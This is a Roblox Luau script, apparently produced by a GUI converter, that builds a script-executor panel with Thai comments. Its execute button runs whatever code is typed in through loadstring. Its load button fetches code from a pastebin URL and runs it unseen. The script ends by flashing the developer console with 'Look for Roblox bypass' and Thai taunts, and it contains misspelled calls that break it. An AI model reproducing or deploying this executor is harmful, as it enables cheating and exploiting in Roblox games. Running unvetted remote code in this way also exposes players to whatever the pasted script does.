LMG2L["TextLabel2_28"]["BorderSizePixel"] = 0;
LMG2L["TextLabel2_28"]["TextScaled"] = true;
LMG2L["TextLabel2_28"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
LMG2L["TextLabel2_28"]["Size"] = UDim2.new(0, 42, 0, 24);
LMG2L["TextLabel2_28"]["Text"] = [[□]];
LMG2L["TextLabel2_28"]["Name"] = [[TextLabel2]];
LMG2L["TextLabel2_28"]["Position"] = UDim2.new(0, 650, 0, 0);


-- Players.giruoh_jgry.PlayerGui.ScreenGui.top.TextLabel
LMG2L["TextLabel_29"] = Instance.new("TextLabel", LMG2L["top_2"]);
LMG2L["TextLabel_29"]["TextWrapped"] = true;
LMG2L["TextLabel_29"]["BorderSizePixel"] = 0;
LMG2L["TextLabel_29"]["TextScaled"] = true;
LMG2L["TextLabel_29"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
LMG2L["TextLabel_29"]["Size"] = UDim2.new(0, 40, 0, 24);
LMG2L["TextLabel_29"]["Text"] = [[×]];
LMG2L["TextLabel_29"]["Position"] = UDim2.new(0, 692, 0, 0);


-- Players.giruoh_jgry.PlayerGui.ScreenGui.top.ImageLabel
LMG2L["ImageLabel_2a"] = Instance.new("ImageLabel", LMG2L["top_2"]);
LMG2L["ImageLabel_2a"]["BorderSizePixel"] = 0;
LMG2L["ImageLabel_2a"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
-- LMG2L["ImageLabel_2a"]["ImageContent"] = ;
LMG2L["ImageLabel_2a"]["Image"] = [[rbxassetid://126881340340981]];
LMG2L["ImageLabel_2a"]["Size"] = UDim2.new(0, 28, 0, 24);


-- Players.giruoh_jgry.PlayerGui.ScreenGui.top.UIDragDetector
LMG2L["UIDragDetector_2b"] = Instance.new("UIDragDetector", LMG2L["top_2"]);

local player = game.Players.LocalPlayer
local gui = script.Parent

local top = gui:WaitForChild("top")
local mainFrame = top:WaitForChild("script Frame")
local executorFrame = top:WaitForChild("minutesFrame")

-- ปุ่ม
local executeBtn = executorFrame:WaitForChild("TextButton3")
local clearBtn = executorFrame:WaitForChild("TextButton4")
local loadBtn = executorFrame:WaitForChild("TextButton5")

local closeBtn = top:WaitForChild("TextLabel") -- ×
local minimizeBtn = top:WaitForChild("TextLabel3") -- –

local textbox = executorFrame:WaitForChild("TextBox")

-- 🔹 EXECUTE COMMAND
executeBtn.MouseButton1Click:Connect(function()
    	local code = textbox.Text
	
	-- เตือน: ใช้ loadstring ได้เฉพาะเปิดใน Studio + Enable Loadstring ได้เฉพาะ 676767
	local success, err = pcall(function()
		loadstring(code)()
	end)
	
	if not success then
		warn("Error:", err)
    end
end)

-- 🔹 CLEAR
clearBtn.MouseButton1Click:Connect(function()
    textbox.Text = ""
end)

-- 🔹 LOAD (ตัวอย่าง)
loadBtn.MouseButton1Click:Connect(function()
    loadstring(game:HttpGet("https://pastebin.com/raw/7bZyYKCW",true))()
end)

-- 🔹 CLOSE GUI (×)
closeBtn.InputBegan:Connect(function(input)
    if input.UserInputType == Enum.UserInputType.MouseButton1 then
        gui.Enabled = false
    end
end)

-- 🔹 MINIMIZE (–)
minimizeBtn.InputBegan:Connect(function(input)
    if input.UserInputType == Enum.UserInputType.MouseButton1 then
        mainFrame.Visible = not mainFrame.Visible
        executorFrame.Visible = false
    end
end)

-- 🔹 เปิด executor
local openExecutorBtn = mainFrame:FindFirstChild("TextButton2")
if openExecutorBtn then
    openExecutorBtn.MouseButton1Click:Connect(function()
        executorFrame.Visible = true
        mainFrame.Visible = false
    end)
end

-- 🔹 กลับหน้าแรก (Admin panel)
local backBtn = executorFrame:FindFirstChild("TextButton2")
if backBtn then
    backBtn.MouseButton1Click:Connect(function()
        executorFrame.Visible = false
        mainFrame.Visible = true
    end)
end

game.StarterGui:SetCore("DevConsoleVisible", true) 
wait(0.1)
print("Look for Roblox bypass.")
wait(0.5)
pint("บายไอ้บ้า🤑🤑🤑🤑🤑")
pint("555555555")
wait(1.1)
game.StarterGui:SetCore("DevConsoleVisible", false) 


return LMG2L["ScreenGui_1"], require;
